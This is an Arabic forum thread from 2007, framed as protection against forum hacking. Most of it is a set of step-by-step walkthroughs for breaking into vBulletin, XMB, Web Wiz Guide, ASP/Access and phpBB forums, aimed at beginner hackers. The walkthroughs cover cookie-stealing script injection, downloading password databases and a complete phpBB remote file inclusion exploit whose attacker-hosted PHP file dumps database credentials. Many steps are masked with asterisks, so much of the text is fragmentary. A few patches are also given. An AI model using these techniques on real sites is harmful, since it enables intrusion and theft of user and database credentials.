| |
| |
|
#1
24-07-2007, 06:51 مساء
| |||
| |||
 الحمايه من اختراق المنتديات جميع طرق اختراق المنتديات --------- مقدمة : --------- الموضوع : اختراق الـ vBulletin المتطلبات : *********************************** المستوى :********* ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات . ---------- الثغرة : --------- تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML .. طريقة التنفيذ *********************************************** ------------ الحل ----------- للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت ) كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . تاريخ اكتشاف الثغرة : 31 - 1 - 2002 تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح . ارجو ان تستفيدو من الدرس ====================================== إختراق منتديات VP ====================================== اختراق المنتديات بس بمنتديات vb . أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members . ((اذا لا بد من اغلاق قائمة الاعضاء أو العنوان التفصيلي التالي : ***************** ********= العنوان المستضيف للمنتدى مثل = *************8 سيظهر لك عنوان *************************** http://**************************** هذا العنوان الطويل يعني ********************* 5. بكل بساطة غير ********************8 http****************************** العضو رقم************* (((== ها أنت تجتاز ****************== )) ****************** ستحتاجه بالخطوة التالية 6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها : العنوان هذا ستقوم بتغيير الكلمات التالية ************************ ************* كما ذكرنا سابقا الموقع المستضيف للمنتدى ************** أسم المستخدم الخاص بك ******************كلمة السر الخاصة بك ****************البريد الذي سجلت به بالمنتدى ***************** أسم مدير المنتدى ( *****************) 7. بعد أن تغيير جميع ما سبق *************************** 8. ثم ترجع لصفحة المنتدى الرئيسية http://******************* ثم حاول الدخول*************( **************** ) . بالطيع ستظهر لك الصفحة التعيسة التي تقول : ****************** ********************* 9. بكل بساطة أضغط على ************* ********************** 10. أفتح بريدك******************** ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم ====================================== إختراق منتديات xmb ====================================== تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل.. وصف للثغره:: وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر الأصدار المصاب::: XMB 1.6 Magic Lantern Final الشرح والتطبيق::: جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل: 1- عليك بالذهاب الى موقع************ 2- اكتب في منطقة البحث***************** 3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده. 4- اضغط على اي منتدى وقم بكتابة الكلمة التالية*************** *****************يعني راح يكون متل هدا **************** 5- راح ينزل عندك************ المستخدمين*****************. 6- الأن عليك ********************* هذا مثال ********* واباس راح تلقاه قدامه مثل هذا ********************** 8- طبعا**************** *************8 **************************** ====================================== إختراق منتديات Web Wiz Guide ====================================== مثل http://host.basharnet.com/forum هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى أغلب المنتديات مصابة بهذه الثغرة بسم الله الرحمن الرحيم الشرح: ثغرة تصيب منتديات Web Wiz Guide أولا إذهب إلى **** اكتب *********** وانتظر لحد ************* واكتب بعد *********** *************** عن طريق************* بعد ماتاخذ ************** سجل اسمك والباسوورد الآن ************ بس ما حدا يخترق المنتديات الوجودة في **************باختراقها أنا هذا منتدى قمت باختراقه لاحقا *************** ******* ************************ هذا منتدى ************************************ ثغرة في معظم منتديات الـ asp ++++++++++++++++++++++++++ سأذكر احد الثغرات في بعض اللغات الديناميكية******************* وعليها فقس طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها . بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ وتعتمد قواعد بياناتها على ثلاثة أنواع هي : sqlserver && sql && M.S Access واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا . واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم************* مثل هذا المنت ************************************ وطريقة ايجاد مثل هذا النوع منتديات اذهب الى **************** وانتظر ******************* -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ كيف تحمل قاعدة البيانات ؟ اكتب هذا الامتداد ************************** وبعد ذلك حاول ان يكون المنتدى به*************************** ********************** وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات *********************** وتكتبه بعد اسم الموقع والمنتدى مثل ***************************************** ولا بد لكي تقرا قاعدة البيانات ان يكون في ******************* وبعد فتح ********************** من ضمنها وهو المهم جدول المستخدمين ************** وستجد اول*********************** الآن وبعد ان ********************* **************************** *****************************وهذا عنوانها مثال ******************* ادخل وستجد كل ********************** احذف كل ****************** ******************xxxxxxxxxx xxxxxxx ************** من وين ؟ *********************** **********************************xxxxxxxxxx وفي ******************** واضغط ************* ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك ( لا تصدق الدعوه كلها شفراات) والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد __________________________________________________ تفضلو ثغرة في هاك الرد السريع منتدى PHPBB عند تركيبك لهاك الرد السريع سوف تجد هذا الكود if ( $mode == 'smilies' ) { define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); include($phpbb_root_path . 'includes/functions_post.'.$phpEx); generate_smilies('window', PAGE_POSTING); exit; } دقق جيدا بهذا الكود ثم أنشاء ملف جديد سمه extension.inc وضع داخلها مثلا شفرة <?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?> يمكنك وض الخيارات التي تود مشاهدتها من الهاك الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي أتجه الى هذا العنوان URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles بسهولة أستبدل [phpBB_Forum] بعنوان *********** [***************] بعنوان ***************** ماذا ترى؟؟؟ ******************** الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات : ببساطة أفتح الملف quick_reply.php أبحث عن if ( $mode == 'smilies' ) أَضف بعدها مباشرة phpbb_root_path = "./"; وانشاءالله انحلت المشكلة _________________ ثغره جديده في منتديات الvb ________________________ أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله لكن هذي كانت على النسخة التجريبية Beta بالنسبة للثغرة فهي واضحة وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك طبعا استغلالها عن طريق تحويل ************** ******************** PHP: -------------------------------------------------------------------------------- From:************* Subject: ************************ --------------------------------------- --------------- ****************** ******************** **************** --------------------------------------- --------------- ********************* ******************** ----------------------------------------------------- ******************** ----------------------------------------------------- - **************** ********************* ******************* ********************* --------------------------------------- --------------- ********************** ----------------------------------------------------- - vBulletin 3.0.0 Beta 2 < br />vBulletin 2.x -------------------------------------------------------------------------------- ثغره جميله لاختراق منتيات الفورم ____________________________ طبعا تعتمد على *****************. . . . وامتدادها تكون . . . ************* ******************* تصبح . . . *********************** طريقه البحث عن الثغره . . . . ************ **************** ****************ويمكنك كتابه 1**************** 2**************** __________________________________________________ ___________ ثغرة في منتديات vBulletin في ملفcalendar.php _ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ تأكد من وجود ملف calendar.php إذا كان موجود إدخل هذا العنوان *********** المتغيرات 1 بإسم الموقع 2الباسوورد  |
|
مهارات سوفت للبرامج وتطوير المواقع والمنتديات والتبادل التجاري. |
|
#3
24-07-2007, 08:43 مساء
| |||
| |||
 رد: الحمايه من اختراق المنتديات شكرا اخي العزيز ولكن تطور اساليب الهكر عن هذه ولكن تعتبر مرجع للمهتمين وجزاك الله خيرا |
المواضيع المتشابهه | ||||
| الموضوع / كاتب الموضوع | ||||
| هاك الحمايه i.s.s.w v2 حماية شامله للمنتدي حصريا هنا رقم 2.0 (كاتب الموضوع : مُجَاهِد) | ||||
| حل ثغره التحويل في المنتديات (كاتب الموضوع : مُجَاهِد) | ||||
| حل مشكلة البريد والمرفقات والصور الشخصيه في المنتديات (كاتب الموضوع : مُجَاهِد) | ||||
| شرح عمل مربع الحمايه (كاتب الموضوع : ادهم وجدي) | ||||
 |
| أدوات الموضوع | |
| |
| باب الحارة | برنامج ملفات | برنامج المنظم | توب لاين | معهد مطور |
| الإتصال بنا | الإتصال بنا | الإتصال بنا | الإتصال بنا | الإتصال بنا |
